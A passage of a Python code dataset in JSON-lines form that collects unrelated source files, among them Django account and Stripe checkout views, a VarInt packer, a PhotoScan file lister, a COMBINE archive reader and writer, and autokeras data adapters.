'is_auditor'), ( 'is_customer_service'),( 'is_system_admin')}\n\t\tcontext = {\"form\":form,\"branchs\":branchs,\"position\":position}\n\t\ttemplate_name = \"accounts/account_edit.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass Accountnumber(LoginRequiredMixin,View):\n\tdef 
get_number(self):\n\t\tnum = AccountNumber.objects.get(id=1)\n\t\treturn num.accounts\n\n\tdef post_number(self):\n\t\tnum = AccountNumber.objects.get(id=1)\n\t\tnum.accounts = 1+num.accounts\n\t\tnum.save()\n\t\tprint(\"accounts is at \"+str(num.accounts))\n\t\treturn num.accounts\n\n\tdef get(self,*args,**kwargs):\n\t\tprint(\"J working\")\n\n\t\tif self.request.is_ajax():\n\t\t\tt = self.post_number()\n\t\t\tprint(\"============\")\n\t\t\tprint(t)\n\t\t\tt = 100000000+t\n\t\t\treturn JsonResponse({'account':t},status=200)\n\nclass AccountCreate(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tform = UserCreationForm()\n\t\tcontext = {\"form\":form,\"create\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\treturn render(self.request, template_name, context)\n\tdef post(self,*args,**kwargs):\n\t\tform = UserCreationForm(self.request.POST,self.request.FILES)\n\t\tcontext = {\"form\":form,\"create\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\tif form.is_valid():\n\t\t\tuser = self.request.user\n\t\t\trealDate = self.request.POST['date_of_hire']\n\t\t\trealDate = datetime.datetime.strptime(realDate, '%d/%m/%Y').date()\n\t\t\tprint(\"-------------------------\")\n\t\t\tprint(form.cleaned_data.get(\"phone_number\"))\n\t\t\tprint(\"-------------------------\")\n\t\t\tprint(\"is_valid\")\n\t\t\tif(form.cleaned_data.get('position') == \"is_manager\"):\n\t\t\t\tis_manager=True\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_auditor\"):\n\t\t\t\tis_manager=False\n\t\t\t\tis_auditor=True\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_customer_service\"):\n\t\t\t\tis_manager=False\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=True\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_system_admin\"):\n\t\t\t\tis_manager=False\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=True\n\t\t\tuser = form.save(user,realDate)\n\t\t\treturn redirect(\"account\")\n\t\tprint(\"is_not_valid\")\n\t\treturn render(self.request, template_name,context)\n\n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"78747494","text":"from django.shortcuts import render\r\nfrom django.views.generic import View\r\nfrom django.http import JsonResponse, HttpResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.conf import settings\r\nfrom django.urls import reverse\r\nimport stripe\r\n# Create your views here.\r\n\r\n\r\nclass PaymentView(View):\r\n def get(self,request,*args,**kwargs):\r\n return render(request,\"core/payment.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef checkout(request):\r\n session = stripe.checkout.Session.create(\r\n payment_method_types=['card'],\r\n line_items=[{\r\n 'price': 'price_1H06q8IdX0gthvYPWudV1aw1',\r\n 'quantity': 1,\r\n }],\r\n mode='payment',\r\n success_url=request.build_absolute_uri(reverse('thanks')) + '?session_id={CHECKOUT_SESSION_ID}',\r\n cancel_url=request.build_absolute_uri(reverse('index')),\r\n )\r\n\r\n return JsonResponse({\r\n 'session_id' : session.id,\r\n 'stripe_public_key' : settings.STRIPE_PUBLIC_KEY\r\n 
})","sub_path":"day44/payment_integration/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"}
+{"seq_id":"123535734","text":"class VarIntPacker:\r\n\r\n def __init__(self):\r\n self.buffer1 = b''\r\n self.buffer2 = b''\r\n\r\n def addBuffer(self, data):\r\n self.buffer1 += data\r\n\r\n def packToBuffer(self, data):\r\n self.buffer2 += data\r\n\r\n def removeBuffer(self, data):\r\n # drop a leading prefix from the read buffer; strip() also removed\r\n # trailing and repeated bytes, which corrupted the stream\r\n self.buffer1 = self.buffer1[len(data):]\r\n\r\n def clear(self):\r\n self.buffer1 = self.buffer1[len(\r\n self.buffer1):]\r\n\r\n self.buffer2 = self.buffer2[len(\r\n self.buffer2):]\r\n\r\n def getLength(self):\r\n return len(self.buffer2)\r\n\r\n def getBuffer(self):\r\n return self.buffer2\r\n\r\n def makeByte(self, value):\r\n # pack a single integer value (0-255) as a bytes object\r\n return bytes([value])\r\n\r\n def writeByte(self, value):\r\n buffer = b''\r\n\r\n if isinstance(value, str):\r\n value = ord(value)\r\n\r\n while 1:\r\n write = value & 0x7f\r\n value >>= 7\r\n\r\n if value:\r\n buffer += self.makeByte(write | 0x80)\r\n else:\r\n buffer += self.makeByte(write)\r\n break\r\n\r\n self.packToBuffer(buffer)\r\n\r\n def readByte(self):\r\n shift = 0\r\n result = 0\r\n\r\n while 1:\r\n try:\r\n # read the next byte from the front of the buffer; it is\r\n # removed from the buffer below\r\n x = self.buffer1[0]\r\n except IndexError:\r\n raise Exception('Failed to unpack invalid or non-existent bytes!')\r\n\r\n self.buffer1 = self.buffer1[1:]\r\n result |= (x & 0x7f) << shift\r\n shift += 7\r\n\r\n if not (x & 0x80):\r\n break\r\n \r\n return result","sub_path":"VarIntPacker.py","file_name":"VarIntPacker.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"}
+{"seq_id":"163458057","text":"import PhotoScan\nimport os\nimport itertools\n\ndoc = PhotoScan.app.document\n\n\ndef get_folder(chunk):\n file = chunk.cameras[0].photo.path\n path = os.path.dirname(file)\n return path\n\n\ndef get_txt_files(folder_path):\n texts = []\n for file in os.listdir(folder_path):\n if file.endswith(\".txt\"):\n path = os.path.join(folder_path, file)\n texts.append(path)\n return texts\n\n\ndef get_folders():\n folders = []\n for chunk in doc.chunks:\n folder = get_folder(chunk)\n folders.append(folder)\n return folders\n\n\ndef get_all_txt_files():\n texts = []\n for folder in get_folders():\n texts.append(get_txt_files(folder))\n join_list = list(itertools.chain.from_iterable(texts))\n return join_list\n\ntexts = get_all_txt_files()\nfor text in texts:\n print(text)\n\nfile = open(r\"C:\\Users\\mkreidler\\Desktop\\agifolders.txt\", \"w\")\nfor path in texts:\n file.write(path)\n file.write(\"\\n\")\nprint(\"done\")\n","sub_path":"Agisoft/get_all_txts.py","file_name":"get_all_txts.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"}
+{"seq_id":"194030703","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport services.controlers.loggControler\nfrom services.controlers.loggControler import LoggControler\nfrom services.exceptions import *\nfrom services.controlers.controler import Controler\nimport services.querys.psychosocialSupportQuery\nfrom services.querys.psychosocialSupportQuery import PsychosocialSupportQuery\nimport os\nimport hashlib\nimport re\nimport cgi\nimport urllib\nfrom services.tools import *\n\nclass 
PsychosocialSupportsControler(Controler):\n\tdef __init__(self):\n\t\ttry:\n\t\t\tqueryPath=\"services.querys.psychosocialSupportQuery.PsychosocialSupportQuery()\"\n\t\t\tloggMsg=\"PsychosocialSupportsControler\"\n\t\t\tinfoMsg=\"AYUDA_PSICOSOCIAL\"\n\t\t\tsuper(PsychosocialSupportsControler, self).__init__(queryPath, loggMsg, infoMsg)\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: PsychosocialSupportsControler/__init__()', ERROR_NO_DEFINIDO, e.message)\n\n\tdef getByEventId(self, eventId, sessionJson):\n\t\tobjList=[]\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\tobjs = self.queryObj.getByEventIdAndCompanyId(eventId, sessionJson[\"companyIdSession\"])\n\t\t\tfor obj in objs:\n\t\t\t\tobjList.append(obj.toDictFront())\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getByEventId()', ERROR_NO_DEFINIDO, e.message)\t\n\t\treturn objList, state\n\n\tdef getLastConsecutive(self, eventId, sessionJson):\n\t\tconsecutive=[]\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\tconsecutive = self.queryObj.getConsecutive(eventId, sessionJson[\"companyIdSession\"])\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getLastConsecutive()', ERROR_NO_DEFINIDO, e.message)\t\n\t\treturn consecutive, state\n\n\tdef add(self, eventId, stage, checkInTime, departureTime, name, documentTypeId, documentNum, age, gender, epsOrArs, \n\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, sessionJson):\n\t\tmessage=self.infoMsg+\"_NO_REGISTRADO\"\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\t# Validations\n\t\t\tdoRegister, validateMsg = self.getValidate()\n\t\t\t# Registration\n\t\t\tif doRegister == True:\n\t\t\t\tstate, objId = self.queryObj.add(eventId, stage, checkInTime, departureTime, name, documentTypeId, \n\t\t\t\t\tdocumentNum, age, gender, epsOrArs, \n\t\t\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, sessionJson[\"companyIdSession\"])\n\t\t\t\tif state == OK:\n\t\t\t\t\tmessage 
= self.infoMsg+\"_REGISTRADO\"\n\t\t\telse:\n\t\t\t\tstate = 203\n\t\t\t\tmessage = validateMsg\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-add()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn message, state\n\n\tdef edit(self, eventId, stage, checkInTime, departureTime, name, documentTypeId, documentNum, age, gender, epsOrArs, \n\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, identifier):\n\t\tmessage=self.infoMsg+\"_NO_MODIFICADO\"\n\t\tstate = 300\n\t\ttry:\n\t\t\tobj = self.queryObj.getById(identifier)\n\t\t\tobj.eventId=eventId\n\t\t\tobj.stage=stage\n\t\t\tobj.checkInTime=checkInTime\n\t\t\tobj.departureTime=departureTime\n\t\t\tobj.name=name\n\t\t\tobj.documentTypeId=documentTypeId\n\t\t\tobj.documentNum=documentNum\n\t\t\tobj.age=age\n\t\t\tobj.gender=gender\n\t\t\tobj.epsOrArs=epsOrArs\n\t\t\tobj.township=township\n\t\t\tobj.temporaryAccommodation=temporaryAccommodation\n\t\t\tobj.thePatientExpresses=thePatientExpresses\n\t\t\tobj.physicalSymptoms=physicalSymptoms\n\t\t\tobj.behavioralSymptoms=behavioralSymptoms\n\t\t\tobj.cognitiveSymptoms=cognitiveSymptoms\n\t\t\tobj.personalLosses=personalLosses\n\t\t\tobj.materialLosses=materialLosses\n\t\t\tobj.triage=triage\n\t\t\tobj.socialSupportNetwork=socialSupportNetwork\n\t\t\tobj.antecedentsProblem=antecedentsProblem\n\t\t\tobj.guidelinesToFollow=guidelinesToFollow\n\t\t\tobj.mentalHealthProfessional=mentalHealthProfessional\n\t\t\tobj.professionalCard=professionalCard\n\t\t\tobj.signatureProfessional=signatureProfessional\n\t\t\tobj.outpatientTreatment=outpatientTreatment\n\t\t\tobj.canMove=canMove\n\t\t\tobj.reasonForRemission=reasonForRemission\n\t\t\tobj.remitted=remitted\n\t\t\tobj.affiliationType=affiliationType\n\t\t\tobj.whatEntity=whatEntity\n\t\t\tobj.ambulance=ambulance\n\t\t\tobj.sdsCode=sdsCode\n\t\t\tobj.remissionTime=remissionTime\n\t\t\tobj.mentalHealthProfessional2=mentalHealthProfessional2\n\t\t\tobj.professionalCard2=professionalCard2\n\t\t\tobj.signatureProfessional2=signatureProfessional2\n\t\t\tself.queryObj.edit(obj)\n\t\t\tmessage=self.infoMsg+\"_MODIFICADO\"\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-edit()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn message, state\n\n\tdef getValidate(self, **kwargs):\n\t\tvalidate = False\n\t\tvalidateMsg = \"ERROR_EN_VALIDACIÓN\"\n\t\ttry:\n\t\t\t# Any validations that are required are included here\n\t\t\t# In case they are satisfied...\n\t\t\tvalidate = True\n\t\t\tvalidateMsg = \"VALIDACIÓN EXITOSA\"\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getValidate()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn validate, validateMsg","sub_path":"services/controlers/psychosocialSupportsControler.py","file_name":"psychosocialSupportsControler.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} 
+{"seq_id":"321114594","text":"from .._tier0 import execute\nfrom .._tier0 import plugin_function\nfrom .._tier0 import Image\n\n@plugin_function\ndef copy_horizontal_slice(source : Image, destination : Image = None, slice_index : int = 0) -> Image:\n \"\"\"This method has two purposes: \n It copies a 2D image to a given slice y position in a 3D image stack or\n It copies a given slice at position y in an image stack to a 2D image.\n\n Parameters\n ----------\n source : Image\n destination : Image, optional\n slice_index : Number, optional\n \n Returns\n -------\n destination\n \n Examples\n --------\n >>> import pyclesperanto_prototype as cle\n >>> cle.copy_slice(source, destination, slice_index)\n \n References\n ----------\n .. [1] https://clij.github.io/clij2-docs/reference_copySlice\n \"\"\"\n\n\n parameters = {\n \"dst\":destination,\n \"src\":source,\n \"slice\":int(slice_index)\n }\n\n if (len(destination.shape) == 3):\n execute(__file__, 'copy_horizontal_slice_to_3d_x.cl', 'copy_horizontal_slice_to_3d', [1, source.shape[0], source.shape[1]], parameters)\n else:\n execute(__file__, 'copy_horizontal_slice_from_3d_x.cl', 'copy_horizontal_slice_from_3d', destination.shape, parameters)\n\n return destination\n","sub_path":"pyclesperanto_prototype/_tier1/_copy_horizontal_slice.py","file_name":"_copy_horizontal_slice.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"247506316","text":"\"\"\" Classes for reading and writing OMEX archives\n\n:Author: Jonathan Karr \n:Date: 2020-04-09\n:Copyright: 2020, Center for Reproducible Biomedical Modeling\n:License: MIT\n\"\"\"\n\nfrom .core import ArchiveWriter, ArchiveReader, ArchiveIoError\nfrom .data_model import Archive, ArchiveFile, ArchiveFormat\nfrom ..data_model import Format, Person\nfrom ..biomodel.data_model import BiomodelFormat\nfrom ..simulation.data_model import SimulationFormat\nfrom ..utils import get_enum_format_by_attr\nimport copy\nimport dateutil.parser\nimport libcombine\nimport os\n\n\n__all__ = ['CombineArchiveWriter', 'CombineArchiveReader']\n\n\nclass CombineArchiveWriter(ArchiveWriter):\n \"\"\" Writer for COMBINE/OMEX archives \"\"\"\n\n def run(self, archive, in_dir, out_file):\n \"\"\" Write an archive to a file\n\n Args:\n archive (:obj:`Archive`): description of archive\n in_dir (:obj:`str`): directory which contains the files in the archive\n out_file (:obj:`str`): path to save archive\n\n Raises:\n :obj:`AssertionError`: if files could not be added to the archive or the archive could not be\n saved\n \"\"\"\n # instantiate archive\n archive_comb = libcombine.CombineArchive()\n\n # set metadata about archive\n self._write_metadata(archive, archive_comb, '.')\n\n # add files to archive\n for file in archive.files:\n assert archive_comb.addFile(\n os.path.join(in_dir, file.filename),\n file.filename,\n file.format.spec_url if file.format else '',\n file is archive.master_file\n )\n self._write_metadata(file, archive_comb, file.filename)\n\n # save archive to a file\n assert archive_comb.writeToFile(out_file)\n\n def _write_metadata(self, obj, archive_comb, filename):\n \"\"\" Write metadata about an archive or a file in an archive\n Args:\n obj (:obj:`Archive` or :obj:`ArchiveFile`): archive or file in an archive\n archive_comb (:obj:`libcombine.CombineArchive`): archive\n filename (:obj:`str`): path of object with archive\n \"\"\"\n desc_comb = libcombine.OmexDescription()\n desc_comb.setAbout(filename)\n if 
obj.description:\n desc_comb.setDescription(obj.description)\n for author in obj.authors:\n creator_comb = libcombine.VCard()\n if author.first_name:\n creator_comb.setGivenName(author.first_name)\n if author.last_name:\n creator_comb.setFamilyName(author.last_name)\n desc_comb.addCreator(creator_comb)\n if obj.created:\n date_comb = libcombine.Date()\n date_comb.setDateAsString(obj.created.strftime('%Y-%m-%dT%H:%M:%SZ'))\n desc_comb.setCreated(date_comb)\n if obj.updated:\n date_comb = libcombine.Date()\n date_comb.setDateAsString(obj.updated.strftime('%Y-%m-%dT%H:%M:%SZ'))\n desc_comb.getModified().append(date_comb)\n archive_comb.addMetadata(filename, desc_comb)\n\n\nclass CombineArchiveReader(ArchiveReader):\n \"\"\" Reader for COMBINE/OMEX archives \"\"\"\n\n NONE_DATETIME = '2000-01-01T00:00:00Z'\n\n def run(self, in_file, out_dir):\n \"\"\" Read an archive from a file\n\n Args:\n in_file (:obj:`str`): path to save archive\n out_dir (:obj:`str`): directory which contains the files in the archive\n\n Returns:\n :obj:`Archive`: description of archive\n\n Raises:\n :obj:`ArchiveIoError`: archive is invalid\n \"\"\"\n archive_comb = libcombine.CombineArchive()\n if not archive_comb.initializeFromArchive(in_file):\n raise ArchiveIoError(\"Invalid COMBINE archive\")\n\n # instantiate archive\n archive = Archive(format=ArchiveFormat.combine.value)\n\n # read metadata\n self._read_metadata(archive_comb, '.', archive)\n\n # read files\n for filename in archive_comb.getAllLocations():\n filename = filename.c_str()\n file_comb = archive_comb.getEntryByLocation(filename)\n\n if file_comb.isSetFormat():\n spec_url = file_comb.getFormat()\n format = get_enum_format_by_attr(BiomodelFormat, 'spec_url', spec_url)\n if not format:\n format = get_enum_format_by_attr(SimulationFormat, 'spec_url', spec_url)\n if format:\n format = copy.copy(format)\n else:\n format = Format(spec_url=spec_url)\n else:\n format = None\n\n file = ArchiveFile(\n filename=filename,\n format=format,\n )\n self._read_metadata(archive_comb, filename, file)\n archive.files.append(file)\n\n file_comb = archive_comb.getMasterFile()\n if file_comb:\n filename = file_comb.getLocation()\n archive.master_file = next(file for file in archive.files if file.filename == filename)\n\n # extract files\n archive_comb.extractTo(out_dir)\n\n # return information about archive\n return archive\n\n def _read_metadata(self, archive_comb, filename, obj):\n \"\"\" Read metadata about an archive or a file in an archive\n\n Args:\n archive_comb (:obj:`libcombine.CombineArchive`): archive\n filename (:obj:`str`): path to object within archive\n obj (:obj:`Archive` of :obj:`ArchiveFile`): object to add metadata to\n \"\"\"\n desc_comb = archive_comb.getMetadataForLocation(filename)\n if not desc_comb.isEmpty():\n obj.description = desc_comb.getDescription() or None\n\n for creator_comb in desc_comb.getCreators():\n obj.authors.append(Person(\n first_name=creator_comb.getGivenName() or None,\n last_name=creator_comb.getFamilyName() or None,\n ))\n\n created_comb = desc_comb.getCreated().getDateAsString()\n if created_comb == self.NONE_DATETIME:\n obj.created = None\n else:\n obj.created = dateutil.parser.parse(created_comb)\n\n obj.updated = None\n for modified_comb in desc_comb.getModified():\n updated = dateutil.parser.parse(modified_comb.getDateAsString())\n if obj.updated:\n obj.updated = max(obj.updated, updated)\n else:\n obj.updated = 
updated\n","sub_path":"Biosimulations_utils/archive/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"16648052","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\n\nfrom autokeras.engine import adapter as adapter_module\n\nCATEGORICAL = 'categorical'\nNUMERICAL = 'numerical'\n\n\nclass InputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to Input to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.number):\n raise TypeError('Expect the data to Input to be numerical, but got '\n '{type}.'.format(type=x.dtype))\n\n\nclass ImageInputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to ImageInput to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n if isinstance(x, np.ndarray) and x.ndim not in [3, 4]:\n raise ValueError('Expect the data to ImageInput to have 3 or 4 '\n 'dimensions, but got input shape {shape} with {ndim} '\n 'dimensions'.format(shape=x.shape, ndim=x.ndim))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.number):\n raise TypeError('Expect the data to ImageInput to be numerical, but got '\n '{type}.'.format(type=x.dtype))\n\n def convert_to_dataset(self, x):\n if isinstance(x, np.ndarray):\n if x.ndim == 3:\n x = np.expand_dims(x, axis=3)\n return super().convert_to_dataset(x)\n\n\nclass TextInputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to TextInput to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n\n if isinstance(x, np.ndarray) and x.ndim != 1:\n raise ValueError('Expect the data to TextInput to have 1 dimension, but '\n 'got input shape {shape} with {ndim} dimensions'.format(\n shape=x.shape,\n ndim=x.ndim))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.character):\n raise TypeError('Expect the data to TextInput to be strings, but got '\n '{type}.'.format(type=x.dtype))\n\n def convert_to_dataset(self, x):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if isinstance(x, np.ndarray):\n x = tf.data.Dataset.from_tensor_slices(x)\n return x\n\n\nclass StructuredDataInputAdapter(adapter_module.Adapter):\n\n def __init__(self, column_names=None, column_types=None, **kwargs):\n super().__init__(**kwargs)\n self.column_names = column_names\n self.column_types = column_types\n # Variables for inferring column types.\n self.count_nan = None\n self.count_numerical = None\n self.count_categorical = None\n self.count_unique_numerical = []\n self.num_col = None\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'count_nan': self.count_nan,\n 'count_numerical': self.count_numerical,\n 'count_categorical': self.count_categorical,\n 'count_unique_numerical': self.count_unique_numerical,\n 'num_col': self.num_col\n })\n return config\n\n @classmethod\n def from_config(cls, config):\n obj = 
super().from_config(config)\n obj.count_nan = config['count_nan']\n obj.count_numerical = config['count_numerical']\n obj.count_categorical = config['count_categorical']\n obj.count_unique_numerical = config['count_unique_numerical']\n obj.num_col = config['num_col']\n return obj\n\n def check(self, x):\n if not isinstance(x, (pd.DataFrame, np.ndarray)):\n raise TypeError('Unsupported type {type} for '\n '{name}.'.format(type=type(x),\n name=self.__class__.__name__))\n\n # Extract column_names from pd.DataFrame.\n if isinstance(x, pd.DataFrame) and self.column_names is None:\n self.column_names = list(x.columns)\n # column_types is provided by user\n if self.column_types:\n for column_name in self.column_types:\n if column_name not in self.column_names:\n raise ValueError('Column_names and column_types are '\n 'mismatched. Cannot find column name '\n '{name} in the data.'.format(\n name=column_name))\n\n # Generate column_names.\n if self.column_names is None:\n if self.column_types:\n raise ValueError('Column names must be specified.')\n self.column_names = [index for index in range(x.shape[1])]\n\n # Check if column_names has the correct length.\n if len(self.column_names) != x.shape[1]:\n raise ValueError('Expect column_names to have length {expect} '\n 'but got {actual}.'.format(\n expect=x.shape[1],\n actual=len(self.column_names)))\n\n def convert_to_dataset(self, x):\n if isinstance(x, pd.DataFrame):\n # Convert x, y, validation_data to tf.Dataset.\n x = x.values.astype(np.unicode)\n if isinstance(x, np.ndarray):\n x = x.astype(np.unicode)\n dataset = tf.data.Dataset.from_tensor_slices(x)\n return dataset\n\n def fit(self, dataset):\n super().fit(dataset)\n for x in dataset:\n self.update(x)\n self.infer_column_types()\n\n def update(self, x):\n # Calculate the statistics.\n x = nest.flatten(x)[0].numpy()\n if self.num_col is None:\n self.num_col = len(x)\n self.count_nan = np.zeros(self.num_col)\n self.count_numerical = np.zeros(self.num_col)\n self.count_categorical = np.zeros(self.num_col)\n for i in range(len(x)):\n self.count_unique_numerical.append({})\n for i in range(self.num_col):\n x[i] = x[i].decode('utf-8')\n if x[i] == 'nan':\n self.count_nan[i] += 1\n elif x[i] == 'True':\n self.count_categorical[i] += 1\n elif x[i] == 'False':\n self.count_categorical[i] += 1\n else:\n try:\n tmp_num = float(x[i])\n self.count_numerical[i] += 1\n if tmp_num not in self.count_unique_numerical[i]:\n self.count_unique_numerical[i][tmp_num] = 1\n else:\n self.count_unique_numerical[i][tmp_num] += 1\n except ValueError:\n self.count_categorical[i] += 1\n\n def infer_column_types(self):\n column_types = {}\n for i in range(self.num_col):\n if self.count_categorical[i] > 0:\n column_types[self.column_names[i]] = CATEGORICAL\n elif len(self.count_unique_numerical[i])/self.count_numerical[i] < 0.05:\n column_types[self.column_names[i]] = CATEGORICAL\n else:\n column_types[self.column_names[i]] = NUMERICAL\n # Partial column_types is provided.\n if self.column_types is None:\n self.column_types = {}\n for key, value in column_types.items():\n if key not in self.column_types:\n self.column_types[key] = value\n\n\nclass TimeseriesInputAdapter(adapter_module.Adapter):\n\n def __init__(self,\n lookback=None,\n column_names=None,\n column_types=None,\n **kwargs):\n super().__init__(**kwargs)\n self.lookback = lookback\n self.column_names = column_names\n self.column_types = column_types\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'lookback': self.lookback,\n 'column_names': 
self.column_names,\n 'column_types': self.column_types\n })\n return config\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (pd.DataFrame, np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data in TimeseriesInput to be numpy.ndarray'\n ' or tf.data.Dataset or pd.DataFrame, but got {type}.'.\n format(type=type(x)))\n\n if isinstance(x, np.ndarray) and x.ndim != 2:\n raise ValueError('Expect the data in TimeseriesInput to have 2 dimension'\n ', but got input shape {shape} with {ndim} '\n 'dimensions'.format(\n shape=x.shape,\n ndim=x.ndim))\n\n # Extract column_names from pd.DataFrame.\n if isinstance(x, pd.DataFrame) and self.column_names is None:\n self.column_names = list(x.columns)\n # column_types is provided by user\n if self.column_types:\n for column_name in self.column_types:\n if column_name not in self.column_names:\n raise ValueError('Column_names and column_types are '\n 'mismatched. Cannot find column name '\n '{name} in the data.'.format(\n name=column_name))\n\n # Generate column_names.\n if self.column_names is None:\n if self.column_types:\n raise ValueError('Column names must be specified.')\n self.column_names = [index for index in range(x.shape[1])]\n\n # Check if column_names has the correct length.\n if len(self.column_names) != x.shape[1]:\n raise ValueError('Expect column_names to have length {expect} '\n 'but got {actual}.'.format(\n expect=x.shape[1],\n actual=len(self.column_names)))\n\n def convert_to_dataset(self, x):\n if isinstance(x, pd.DataFrame):\n # Convert x, y, validation_data to tf.Dataset.\n x = x.values.astype(np.float32)\n if isinstance(x, np.ndarray):\n x = x.astype(np.float32)\n x = tf.data.Dataset.from_tensor_slices(x)\n x = x.window(self.lookback, shift=1, drop_remainder=True)\n final_data = []\n for window in x:\n final_data.append([elems.numpy() for elems in window])\n final_data = tf.data.Dataset.from_tensor_slices(final_data)\n return final_data\n","sub_path":"autokeras/adapters/input_adapter.py","file_name":"input_adapter.py","file_ext":"py","file_size_in_byte":11299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"316615353","text":"# coding=utf-8\nfrom flask import g\nfrom 